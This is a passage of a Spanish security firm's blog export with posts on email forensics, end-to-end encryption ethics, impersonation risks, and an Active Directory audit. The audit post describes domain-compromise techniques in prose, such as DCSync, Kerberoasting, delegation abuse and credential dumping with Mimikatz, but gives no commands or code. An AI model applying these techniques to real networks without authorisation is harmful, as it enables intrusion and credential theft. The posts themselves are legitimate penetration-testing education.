cuenta.</span></li></ul><ul><li><span style="font-family: Barlow Semi Condensed;"><b>Modus operandi:</b> establecer una hipótesis con los fundamentos más objetivos y certeros disponibles que indique como se pudo realizar el ataque.</span></li></ul><ul><li><span style="font-family: Barlow Semi Condensed;"><b>Objetivo: </b>analizar el posible objetivo del atacante, así como el beneficio que obtendría, en casos complejos puede ser de ayuda.</span></li></ul><ul><li><span style="font-family: Barlow Semi Condensed;"><b>Ficheros adjuntos: </b>extracción de los metadatos de los ficheros y análisis tanto de estos como de la información del documento en sí (firma, número de cuenta bancaria, etc.).</span></li></ul><p></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Como aspecto clave en el análisis forense cabe destacar la extracción del elemento y la cadena de custodia de éste como elemento. Si bien es importante en el ámbito forense, toma especial relevancia en el caso del correo, pues se ha de realizar un análisis del mismo en todos los puntos por donde han pasado.</span></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">En el análisis forense, por tanto, es siempre recomendable acudir a los mejores expertos, aquellos que realicen una buena identificación de las evidencias y sean capaces de relatar los hechos comprobados sin caer en suposiciones o falsas creencias. Además, de que siempre y cuando el informe vaya a ser presentado a juicio, se realice una correcta custodia de los dispositivos y/o ficheros, contando también con los peritos que realizaron el informe para su correcta defensa en sede judicial.</span></p><p style="text-align: justify;"><br /></p><p style="text-align: right;"><span style="font-family: Barlow Semi Condensed;">Sergio Gutierrez, <i>Technical Lead </i>en <a href="http://www.zerolynx.com/es">Zerolynx </a>y <a href="https://www.linkedin.com/in/noeliab/">Noelia B.</a> <i>Analista de Ciberinteligencia</i> en <a href="http://www.zerolynx.com/es">Zerolynx</a>.</span></p>Celia Catalánhttp://www.blogger.com/profile/17028922234459073806noreply@blogger.com0Madrid, España40.4167754 -3.703790212.106541563821153 -38.8600402 68.727009236178844 31.4524598tag:blogger.com,1999:blog-7938680518783212855.post-66173670798760457892023-11-27T08:30:00.008+01:002023-11-28T12:45:14.406+01:00Entre Bits y Valores: El Debate Ético en Torno al Cifrado de Extremo a Extremo<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIaT9UeeMVoHkGqzPArWwrsbYjS4KAsEY1wSSXa8oxL-iuJKF2w_NkDGhPrHOUmqtvZPkxXnlF9LfMaOtamy_3nSV6vWfYpB16SdLJyjmSmng6FsXBFCmmlY9mBjHMuL2MnFKHGpTWV-dQJiyr2QId70yBZIc1qguiAFigO3mPVKtvflCB9dxjSVRRDV8C/s1920/Tr%C3%A1fico%20cifrado%20de%20extremo%20a%20extremo.jpg" style="margin-left: 1em; margin-right: 1em;"><img alt="Esquema explicativo de cifrado de extremo a extremo" border="0" data-original-height="1080" data-original-width="1920" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIaT9UeeMVoHkGqzPArWwrsbYjS4KAsEY1wSSXa8oxL-iuJKF2w_NkDGhPrHOUmqtvZPkxXnlF9LfMaOtamy_3nSV6vWfYpB16SdLJyjmSmng6FsXBFCmmlY9mBjHMuL2MnFKHGpTWV-dQJiyr2QId70yBZIc1qguiAFigO3mPVKtvflCB9dxjSVRRDV8C/w640-h360/Tr%C3%A1fico%20cifrado%20de%20extremo%20a%20extremo.jpg" width="640" /></a></div><br /><h3 style="text-align: justify;"> <span style="font-family: Barlow Semi Condensed;">¿Qué es el cifrado extremo a extremo y por qué es importante?</span></h3><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">A lo largo de la última década, la seguridad de la información ha ido cobrando mayor importancia y concienciación, donde uno de los aspectos de la seguridad ha sido conversar de manera privada evolucionando los sistemas arcaicos de trasmisión de información en claro por sofisticados mecanismos de cifrado extremo a extremo. </span></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">El cifrado de extremo a extremo (<i>E2EE – End to End Ecryption</i>) es un mecanismo de seguridad informática que permite garantizar la confidencialidad y la integridad de los datos en una comunicación entre dos partes a través de un canal potencialmente inseguro. Consiste en cifrar los datos en el extremo origen y descifrarlos en el destino (cliente-cliente) sin que esto se haga en el servidor del proveedor de servicios, asegurando que un tercero no logre interceptar los datos en claro sin la clave de descifrado pertinente. El par de claves asimétrico [<a href="https://youtu.be/w5dWeZwfK8w?si=70Arkine_WmHy3jX">1</a>], se genera entre el remitente y el destinatario, lo que implica que sólo estas dos partes tienen acceso a las claves necesarias para descifrar los datos. Por tanto, la pérdida del par de claves impediría el acceso a los mensajes trasmitidos. </span></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Un ejemplo práctico se encuentra en aplicaciones de mensajería instantánea como Signal, proyecto de código abierto haciendo uso de cifrado robusto <i>Extended Triple Diffie-Hellman</i> [<a href="https://en.wikipedia.org/wiki/Post-Quantum_Extended_Diffie-Hellman">2</a>] o <i>Post-Quantum Extended Diffie-Hellman</i> [<a href="https://en.wikipedia.org/wiki/Post-Quantum_Extended_Diffie-Hellman">3</a>] a prueba de ordenadores cuánticos. En ésta se garantiza la privacidad desde el punto de vista tecnológico cuyo único dato vinculado es el número de teléfono. Aunque pueda parecer una aplicación ideal desde el punto de vista de la privacidad, la principal desventaja que presenta es su uso poco extendido. Otras aplicaciones muy conocidas como WhatsApp también se basan en el mismo esquema [<a href="https://faq.whatsapp.com/820124435853543/?locale=es_LA">4</a>], donde la privacidad de las conversaciones se mantiene intacta (siempre y cuando no hayas sido reportado por un usuario [<a href="https://faq.whatsapp.com/414631957536067/?helpref=hc_fnav">5</a>]). Por contra, la gran cantidad de otros datos y metadatos del usuario no cifrados y recopilados en sus servidores podría poner en peligro la privacidad [<a href="https://www.xataka.com/basics/signal-vs-telegram-vs-whatsapp-cuales-diferencias-cual-cuida-tu-privacidad">6</a>]. </span></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Otra arquitectura opuesta al cifrado extremo a extremo es el cifrado de datos en tránsito, que consiste cifrar el mensaje en el extremo emisor, descifrarlo en el servidor, volver a cifrarlo en éste y descifrarlo finalmente en el extremo receptor (cliente-servidor-cliente). Al igual que el anterior, protege la información durante su transmisión, pero permite que el servidor intermediario pueda hacer uso de los mensajes transmitidos [<a href="https://www.kaspersky.es/blog/what-is-end-to-end-encryption/23862/">7</a>].</span></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Un ejemplo de esta arquitectura es el aplicativo Telegram, donde los mensajes privados utilizan la nube para alojar y procesar los datos transmitidos. No obstante, el aplicativo también ofrece la opción de cifrar extremo a extremo la comunicación mediante los ‘mensajes secretos’ [<a href="https://core.telegram.org/api/end-to-end">8</a>]. </span></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Como se puede observar, las tecnologías en la privacidad son muy sofisticadas, donde a pesar de la arquitectura o los cifrados empleados, existen factores no tecnológicos como las condiciones y la gestión ofrecidas por las proveedoras de servicios que pueden influir de manera indirecta en la privacidad del usuario. </span></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Teniendo en cuenta el auge del cifrado E2EE no sólo en el ámbito de la mensajería instantánea con funciones básicas muy comunes entre ellas, sino también en el correo electrónico, videoconferencia u otros, existe un punto de inflexión donde los usuarios con intenciones fraudulentas podrían aprovechar las ventajas de la tecnología para transmitir contenido ilegal sin ser detectado. Tanto es así, que las instituciones gubernamentales podrían implementar restricciones en el uso de los protocolos extremo a extremo [<a href="https://www.wired.com/story/europe-break-encryption-leaked-document-csa-law/">9</a>] al verse entorpecidos en el control masivo de contenido ilícito mediante palabras clave u otros métodos, tal y cómo ocurrió en 1993 con Phil Zimmermann [<a href=" https://www.wired.com/2016/04/the-critical-hole-at-the-heart-of-cell-phone-infrastructure/">10</a>] bajo investigación por el haber publicado PGP (<i>Pretty Good Privacy</i>). Una posible medida podría consistir en obligar a las empresas tecnológicas a implementar mecanismos de control o escaneos de contenido en cada extremo antes del cifrado y su emisión al receptor, dejando la característica principal del protocolo inutilizado. </span></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Por recapitular, independientemente del dilema moral hasta dónde se debe permitir el acceso de las autoridades a nuestra privacidad, se recomienda el uso de aplicaciones que recojan el menor número de datos posibles, a ser posible de código abierto y no controlados por una compañía gigante conocida por sus fines comerciales. Adicionalmente se recomienda proteger el extremo más débil, el terminal, no sólo a nivel de aplicativos con posible malware incrustado, vulnerabilidades explotables o backdoors, sino también mediante la protección de una contraseña robusta o el empleo de doble factor de verificación. </span></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">¿Qué opinas sobre prohibir el uso de cifrados de extremo a extremo? </span></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">¿Y sobre el uso de estos protocolos?</span></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">¿Está reñida la privacidad la finalidad de la comunicación?</span></p><h4 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Referencias</span></h4><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed; font-size: x-small;">[1] <span style="white-space: pre;"> </span>J. Ramió Aguirre, «Class4crypt c4c10.4 Algoritmo RSA,» [En línea]. Available: <a href="https://youtu.be/w5dWeZwfK8w?si=70Arkine_WmHy3jX">https://youtu.be/w5dWeZwfK8w?si=70Arkine_WmHy3jX</a></span></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed; font-size: x-small;">[2] <span style="white-space: pre;"> </span>Wikipedia, [En línea]. Available: <a href="https://en.wikipedia.org/wiki/Post-Quantum_Extended_Diffie-Hellman">https://en.wikipedia.org/wiki/Post-Quantum_Extended_Diffie-Hellman</a></span></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed; font-size: x-small;">[3] <span style="white-space: pre;"> </span>Web. [En línea]. Available: <a href="https://en.wikipedia.org/wiki/Post-Quantum_Extended_Diffie-Hellman">https://en.wikipedia.org/wiki/Post-Quantum_Extended_Diffie-Hellman</a></span></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed; font-size: x-small;">[4] <span style="white-space: pre;"> </span>WhatsApp, [En línea]. Available:<a href="https://faq.whatsapp.com/820124435853543/?locale=es_LA"> https://faq.whatsapp.com/820124435853543/?locale=es_LA</a></span></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed; font-size: x-small;">[5] <span style="white-space: pre;"> </span>WhatsApp, [En línea]. Available: <a href="https://faq.whatsapp.com/414631957536067/?helpref=hc_fnav">https://faq.whatsapp.com/414631957536067/?helpref=hc_fnav</a></span></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed; font-size: x-small;">[6] <span style="white-space: pre;"> </span>Xataka, «Signal vs Telegram vs WhatsApp: cuáles son las diferencias y cuál cuida más tu privacidad,» [En línea]. Available: <a href="https://www.xataka.com/basics/signal-vs-telegram-vs-whatsapp-cuales-diferencias-cual-cuida-tu-privacidad">https://www.xataka.com/basics/signal-vs-telegram-vs-whatsapp-cuales-diferencias-cual-cuida-tu-privacidad</a></span></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed; font-size: x-small;">[7] <span style="white-space: pre;"> </span>«¿Qué es el cifrado de extremo a extremo y por qué lo necesitas?,» [En línea]. Available: <a href="https://www.kaspersky.es/blog/what-is-end-to-end-encryption/23862/">https://www.kaspersky.es/blog/what-is-end-to-end-encryption/23862/</a></span></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed; font-size: x-small;">[8] <span style="white-space: pre;"> </span>Telegram, [En línea]. Available: <a href="https://core.telegram.org/api/end-to-end">https://core.telegram.org/api/end-to-end</a></span></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed; font-size: x-small;">[9] <span style="white-space: pre;"> </span>«Leaked Government Document Shows Spain Wants to Ban End-to-End Encryption,» [En línea]. Available: <a href="https://www.wired.com/story/europe-break-encryption-leaked-document-csa-law/">https://www.wired.com/story/europe-break-encryption-leaked-document-csa-law/</a></span></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed; font-size: x-small;">[10] <span style="white-space: pre;"> </span>«The Critical Hole at the Heart of Our Cell Phone Networks,» [En línea]. Available: <a href="https://www.wired.com/2016/04/the-critical-hole-at-the-heart-of-cell-phone-infrastructure/">https://www.wired.com/2016/04/the-critical-hole-at-the-heart-of-cell-phone-infrastructure/</a></span></p><p><span style="font-family: Barlow Semi Condensed;"><br /></span></p><p style="text-align: right;"><span style="font-family: Barlow Semi Condensed;"><a href="https://www.linkedin.com/in/arturo-fernandez-m/">Arturo Fernández</a>, Analista de Ciberseguridad en <a href="http://www.zerolynx.com/es">Zerolynx</a>.</span></p>Celia Catalánhttp://www.blogger.com/profile/17028922234459073806noreply@blogger.com0Madrid, España40.4167754 -3.703790212.106541563821153 -38.8600402 68.727009236178844 31.4524598tag:blogger.com,1999:blog-7938680518783212855.post-32121448354125464852023-11-20T08:30:00.008+01:002023-11-20T17:09:32.817+01:00Auditoría básica de ciberseguridad a un dominio de Microsoft<p><span style="text-align: justify;"><br /></span></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1koYkhSrhl35jqrplX8jF17qCWQ6jjBLuB0_4MnIkYjcGSW0cf7llcrdYCi6V1eP8mzvGzwCtI8EUR2Vcjxx3Pcx9QQrA_R0CA1ofDyNLbaJGYMyE3rz_NfldArgD_dfWNCNg3pdZjlV-F97YUrKxcloEgyhDOOIb2YRThp9qDN3AQKSZpyv6WQK940oc/s1280/ad.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="720" data-original-width="1280" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1koYkhSrhl35jqrplX8jF17qCWQ6jjBLuB0_4MnIkYjcGSW0cf7llcrdYCi6V1eP8mzvGzwCtI8EUR2Vcjxx3Pcx9QQrA_R0CA1ofDyNLbaJGYMyE3rz_NfldArgD_dfWNCNg3pdZjlV-F97YUrKxcloEgyhDOOIb2YRThp9qDN3AQKSZpyv6WQK940oc/w640-h360/ad.png" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><p></p><p><span style="font-family: Barlow Semi Condensed;"><span style="text-align: justify;">El Directorio Activo (</span><i style="text-align: justify;">Active
Directory</i><span style="text-align: justify;">) es un componente crítico en la infraestructura de muchas
organizaciones, utilizado para gestionar recursos y usuarios en entornos
Windows. La auditoría de Directorio Activo es esencial para garantizar la
seguridad de la red y la integridad de los datos. A continuación, partiendo del
compromiso asumido de que un usuario de dominio ha sido vulnerado, exploraremos
los principales vectores de ataque que debemos identificar:</span></span></p><p><span style="font-family: Barlow Semi Condensed;"><span style="text-align: justify;"><br /></span></span></p><p class="MsoNormal" style="text-align: justify;"><b><span style="font-family: Barlow Semi Condensed;">1. Escalada de Privilegios
Local<o:p></o:p></span></b></p><p class="MsoNormal" style="margin-left: 36pt; text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Aunque no
siempre es necesario, es altamente recomendable partir de permisos de
administración en la máquina atacante. De esta manera el uso de herramientas
será mucho más cómodo. Para ello se pueden utilizar herramientas como <i>PowerUp</i>,
<i>WinPeas </i>o <i>SeatBelt </i>entre otras, para identificar caminos que permitan una
escalada a administrador local.<o:p></o:p></span></p><p class="MsoNormal" style="text-align: justify;"><b><span style="font-family: Barlow Semi Condensed;">2. Políticas de Contraseñas<o:p></o:p></span></b></p><p class="MsoNormal" style="margin-left: 36pt; text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Una política
de contraseñas débil puede ser útil para realizar ataques de tipo <i>passwordspraying</i>
(esto debe realizarse cuidadosamente para no bloquear cuentas) o para el
posterior crackeo de hashes identificados. Además, en caso de que no exista
política de bloqueo tras intentos fallidos, sería posible hacer fuerza bruta
contra todo el dominio sin temor a bloquear las cuentas de usuario.<o:p></o:p></span></p><p class="MsoNormal" style="text-align: justify;"><b><span style="font-family: Barlow Semi Condensed;">3. Identificar secretos en
carpetas compartidas.<o:p></o:p></span></b></p><p class="MsoNormal" style="margin-left: 36pt; text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Una vez se
dispone de un usuario de dominio, es recomendable enumerar las carpetas
compartidas a las que se tiene acceso (por ejemplo, con <i>smbclient</i>). En
ocasiones, se pueden identificar documentos que recogen algún tipo de
credencial, la cual puede ser válida o servir como punto de partida para
adivinar otras contraseñas.<o:p></o:p></span></p><p class="MsoNormal" style="text-align: justify;"><b><span style="font-family: Barlow Semi Condensed;">4. Identificación de sistemas
operativos obsoletos<o:p></o:p></span></b></p><p class="MsoNormal" style="margin-left: 36pt; text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Se debe
verificar que no se estén utilizando sistemas operativos fuera de soporte y/o
desactualizados. Este tipo de equipos pueden ser muy útiles, ya que es
altamente probable que tengan vulnerabilidades explotables con <i>exploits
</i>públicos. Aunque no se traten de objetivos relevantes, acceder a ellos puede
ser interesante para obtener las credenciales que tengan almacenadas. Es muy
importante avisar al responsable de IT de que se va a hacer uso de <i>exploits</i>,
por si estos pudiesen causar una caída en el servicio de la empresa.<o:p></o:p></span></p><p class="MsoNormal" style="text-align: justify;"><b><span style="font-family: Barlow Semi Condensed;">5. Identificación de cuentas
privilegiadas<o:p></o:p></span></b></p><p class="MsoNormal" style="margin-left: 36pt; text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Es muy
interesante realizar un proceso inicial de enumeración en el que se
identifiquen las cuentas objetivo que permitan comprometer la totalidad del
dominio. Durante esta fase de enumeración no solo se buscan las cuentas de
<i>Domain admin,</i> si no que también es importante identificar cuentas con permisos
especiales que permitan llevar a cabo movimientos en el dominio. En puntos
siguientes veremos por qué esto es importante.<o:p></o:p></span></p><p class="MsoNormal" style="text-align: justify;"><b><span style="font-family: Barlow Semi Condensed;">6. Identificación y Abuso de
cuentas con <i>Constrained Delegation<o:p></o:p></i></span></b></p><p class="MsoNormal" style="margin-left: 36pt; text-align: justify;"><span style="font-family: Barlow Semi Condensed;">En un punto
anterior se indicaba que era necesario identificar cuentas con permisos
elevados, pues este es un tipo concreto de cuenta privilegiada. Estas pueden
tener delegado en ellas el poder de impersonar a cualquier usuario del dominio
para una serie de servicios determinados. Gracias a esto, si se consigue
comprometer una cuenta con <i>constrained delegation</i>, es posible suplantar
a cualquier usuario para servicios de Windows como host, RPCSS, http, wsman, cifs,
ldap, krbtgt o winrm. <o:p></o:p></span></p><p class="MsoNormal" style="text-align: justify;"><b><span style="font-family: Barlow Semi Condensed;">8. Identificación y Abuso de <i>Unconstrained
Delegation</i><o:p></o:p></span></b></p><p class="MsoNormal" style="margin-left: 36pt; text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Este es otro
tipo de cuenta privilegiada de alto interés. Estas cuentas están autorizadas
para recibir y almacenar los TGT (<i>Ticket Granting Ticket</i>) de <i>kerberos </i>de
cualquier cuenta. Es por ello, que al acceder a ellas sería posible extraer los
tickets almacenados en las mismas. Por otro lado, también es posible realizar
ataques de autenticación forzada sobre esta máquina, es decir, forzar a
cualquier máquina del domino a autenticarse contra la máquina <i>unconstrained</i>
comprometida. De esta manera, la nueva víctima (el controlador de dominio, por
ejemplo) enviaría una copia de su TGT a la máquina <i>unconstrained</i>, siendo
posible su interceptación.<o:p></o:p></span></p><p class="MsoNormal" style="text-align: justify;"><b><span style="font-family: Barlow Semi Condensed;">9. Identificar y Abusar
Permisos de DCSync<o:p></o:p></span></b></p><p class="MsoNormal" style="margin-left: 36pt; text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Seguimos con
cuentas privilegiadas interesantes. En este caso es necesario identificar
cuentas con permisos de DCSync, es decir, cuentas que tengan los permisos <i>DS-Replication-Get-Changes-All</i>
y <i>DS-Replication-Get-Changes</i>. Si conseguimos comprometer una credencial
con estos permisos, podremos realizar un ataque de DCSync, o lo que es lo
mismo, simular que somos un controlador de dominio que quiere sincronizar su
base de datos (ntds.dit) con la del controlador de dominio real. De esta manera
se obtendrían todos los hashes del dominio, incluyendo los del Domain Admin.</span></p><p class="MsoNormal" style="text-align: justify;"><b><span lang="EN-US"><span style="font-family: Barlow Semi Condensed;">10. Identificar y Abusar <i>Resource-Based
Constrained Delegation</i><o:p></o:p></span></span></b></p><p class="MsoNormal" style="margin-left: 36pt; text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Si como
atacantes podemos identificar una cuenta con permisos de “GenericWrite” o
“GenericAll” sobre “ActiveDirectoryRights”, significará que esta cuenta tiene
la capacidad de otorgar permisos de <i>constrained delegation</i> a cualquier
cuenta del dominio. Esto quiere decir que, si comprometemos esta cuenta,
podremos indicar que cualquier cuenta del dominio pueda pedir TGSs (<i>Ticket
Garanting Service</i>) para servicios de cualquier máquina del dominio,
incluyendo nuestro objetivo principal: el controlador de dominio.</span></p><p class="MsoNormal" style="text-align: justify;"><b><span style="font-family: Barlow Semi Condensed;">11. Identificar y Abusar
Plantillas de Certificados Vulnerables<o:p></o:p></span></b></p><p class="MsoNormal" style="margin-left: 36pt; text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Este tipo de
ataque se basa en utilizar herramientas como <i>certify</i> o <i>certipy</i>
para identificar plantillas de certificados vulnerables en la CA (<i>certificate
authority</i>) corporativa. Existen una serie de escenarios vulnerables
posibles, que permiten a un atacante solicitar certificados en nombre de otros
usuarios, por ejemplo, de un <i>Domain Admin</i> o de cualquier cuenta
privilegiada.</span></p><p class="MsoNormal" style="text-align: justify;"><b><span style="font-family: Barlow Semi Condensed;">12. Identificar Servicios
Vulnerables<o:p></o:p></span></b></p><p class="MsoNormal" style="margin-left: 36pt; text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Es posible que
en los directorios activos se encuentren máquinas con servicios diferentes a
los propios del directorio activo desplegados (aunque no es una buena práctica),
por ejemplo, Jenkins o servicios SQL. Es importante identificar estos servicios
para comprobar si son vulnerables, ya que en muchas ocasiones pueden servir
como punto de acceso a la máquina en la que se están ejecutando. La situación
ideal para un atacante sería identificar un servicio que poder explotar, y que
este estuviese siendo ejecutado con un usuario administrador local de la
máquina. De esta manera, al conseguir ejecución remota de código mediante el
servicio explotable, sería posible comprometer toda la máquina.<o:p></o:p></span></p><p class="MsoNormal" style="text-align: justify;"><b><span style="font-family: Barlow Semi Condensed;">13. Kerberoasting<o:p></o:p></span></b></p><p class="MsoNormal" style="margin-left: 36pt; text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Kerberoasting
es un ataque que se basa en la explotación de cuentas de servicio que tienen
asociados <i>Service Principal Names</i> (SPNs). Estos SPNs son registros que
asocian un servicio o aplicación específica con una cuenta de servicio en el
Directorio Activo. <o:p></o:p></span></p><p class="MsoNormal" style="margin-left: 36pt; text-align: justify;"><span style="font-family: Barlow Semi Condensed;">El objetivo de
hacer kerberoasting es solicitar tickets de estas cuentas de servicio para,
posteriormente, descifrarlos offline y obtener las contraseñas originales. Esto
es posible ya que parte del ticket solicitado está cifrado utilizando una clave
derivada de la contraseña original.<o:p></o:p></span></p><p class="MsoNormal" style="text-align: justify;"><b><span style="font-family: Barlow Semi Condensed;">14. Extracción de Credenciales<o:p></o:p></span></b></p><p class="MsoNormal" style="margin-left: 36pt; text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Una vez
comprometida cualquier máquina, el procedimiento a seguir es extraer de la
misma cualquier contraseña almacenada. Para ello se pueden utilizar herramientas
como Mimikatz. Estas credenciales pueden ser útiles para realizar movimientos
laterales a través del dominio, comprometiendo máquinas en las que los usuarios
que se van recolectando sean administradores locales.</span></p><p class="MsoNormal" style="text-align: justify;"><b><span style="font-family: Barlow Semi Condensed;">Conclusión<o:p></o:p></span></b></p><p class="MsoNormal" style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Acabamos de ver solo algunas de
las técnicas mas utilizadas durante una auditoría, pero los atacantes descubren
técnicas nuevas todos los días, cada cual más innovadora. Por ello os invitamos
a que investiguéis y descubráis vuestros propios caminos hacia controladores de
dominio.<o:p></o:p></span></p><p class="MsoNormal" style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></p><p class="MsoNormal" style="text-align: right;"><span style="font-family: Barlow Semi Condensed;"><a href="https://www.linkedin.com/in/ignacio-sanchez-jimenez/">Ignacio Sánchez</a>, Analista de Ciberseguridad en <a href="http://www.zerolynx.com/es">Zerolynx</a>.</span></p><p>
</p><div class="separator" style="clear: both; text-align: center;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><br /><p></p>Celia Catalánhttp://www.blogger.com/profile/17028922234459073806noreply@blogger.com0Madrid, España40.4167754 -3.703790212.106541563821153 -38.8600402 68.727009236178844 31.4524598tag:blogger.com,1999:blog-7938680518783212855.post-12088282510481593562023-11-13T09:00:00.012+01:002023-11-14T12:15:28.401+01:00 Riesgos asociados a la suplantación de organizaciones<div style="text-align: left;"><div style="text-align: justify;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjk2K2E53RK-hwUhao4LRRXJs6PLmgvfaSMoGgOYDCYACYrd9T16KzSC3VlIo_Q2-JEds7L8Y0AZevCUBnGhUhRfd1I7d2V2GbyfivYl69q8CHsjbXbrAeET69vFN4IB8PdMjHAwRj295dpuyLahSEukNzFdd1DIBv7FmITkHrORyGKPLd7w2P6On7BRybZ/s1920/Dise%C3%B1o%20sin%20t%C3%ADtulo%20(11).jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1080" data-original-width="1920" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjk2K2E53RK-hwUhao4LRRXJs6PLmgvfaSMoGgOYDCYACYrd9T16KzSC3VlIo_Q2-JEds7L8Y0AZevCUBnGhUhRfd1I7d2V2GbyfivYl69q8CHsjbXbrAeET69vFN4IB8PdMjHAwRj295dpuyLahSEukNzFdd1DIBv7FmITkHrORyGKPLd7w2P6On7BRybZ/w640-h360/Dise%C3%B1o%20sin%20t%C3%ADtulo%20(11).jpg" width="640" /></a></div><br /><span style="font-family: "Barlow Semi Condensed";"><br /></span></div><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;">El aumento del uso de Internet ha generado consecuencias en la privacidad e intimidad de las personas. Gran cantidad de información personal puede encontrarse indexada en los principales buscadores o visible en perfiles de redes sociales. Además de toda aquella información personal presente en filtraciones de datos como las sufridas a lo largo del tiempo por grandes servicios como Facebook, Twitter, LinkedIn o Badoo entre muchos otros. </div></span></div><div style="text-align: left;"><div style="text-align: justify;"><span style="font-family: "Barlow Semi Condensed";"><br /></span></div><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;">En ocasiones, desde el departamento de Ciberinteligencia necesitamos transmitir a nuestros clientes la repercusión que estos hechos pueden tener sobre sus compañías y empleados, ya que la información expuesta o filtrada es utilizada por los atacantes para suplantar la identidad de personas con capacidad de decisión o con los medios para realizar pagos. La identificación de este tipo de riesgos sirve a nuestros clientes para prevenir o mitigar posibles ataques.</div></span></div><div style="text-align: left;"><div style="text-align: justify;"><span style="font-family: "Barlow Semi Condensed";"><br /></span></div><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;">Algunas de las técnicas de suplantación de identidad más utilizadas son:</div><div style="text-align: justify;"><br /></div></span><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><ul><li><u><b>Suplantación de dominio o dominio similar (<i>typosquatting</i>):</b></u> variación del dominio que se pretende suplantar usando caracteres muy similares, agregando o eliminando otros de modo que pase inadvertido para la víctima. Otra variante es el uso de un TLD distinto, pero con el mismo nombre de dominio. Ejemplo: elcorteingles.es o vodafone.org.</li></ul></div></span></div><blockquote style="border: none; margin: 0 0 0 40px; padding: 0px;"><div style="text-align: left;"><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;">Dicha suplantación se puede evitar mediante actividades de vigilancia digital, que permiten identificar estas situaciones en el momento de creación de los dominios.</div></span></div></blockquote><div style="text-align: left;"><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><ul><li><b><u>Suplantación de páginas web</u></b>: uso del diseño, logo, imagen de marca de una web lícita para crear una falsa con la que robar credenciales, información de las tarjetas de crédito o realizar fraude vendiendo artículos sin luego enviarlos. </li></ul></div></span></div><blockquote style="border: none; margin: 0 0 0 40px; padding: 0px;"><div style="text-align: left;"><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;">Este tipo de técnicas son evitables, haciendo uso de herramientas que permitan identificar el clonado de una web.</div></span></div></blockquote><div style="text-align: left;"><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><ul><li><b><u>Adquisición de cuenta:</u></b> robo de cuentas de correo debido a la filtración de sus contraseñas. El uso de las contraseñas en diversos servicios (reutilización) así como el uso de la cuenta de correo corporativo fuera del ámbito laboral facilita su robo. Este robo puede conllevar estafas económicas a gran escala utilizando como medio la cuenta robada.</li></ul></div></span></div><blockquote style="border: none; margin: 0 0 0 40px; padding: 0px;"><div style="text-align: left;"><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;">La exfiltración de contraseñas se puede identificar, e incluso mitigar, haciendo uso de técnicas de vigilancia de estas en diferentes sitios donde se publican este tipo de <i>leaks</i>.</div></span></div></blockquote><div style="text-align: left;"><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><br /></div></span><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><ul><li><b>S<u>uplantación de correo electrónico y<i> SMISHING</i>:</u></b> mediante el envío de <i>malware</i> o falsas notificaciones en las que es necesario introducir la contraseña a la cuenta de correo electrónico se genera el robo de las credenciales de esta para posteriormente acceder y realizar la suplantación. También se puede encontrar en este tipo de suplantación el envío de SMS fraudulentos que engañan al usuario para acceder a una web suplantada 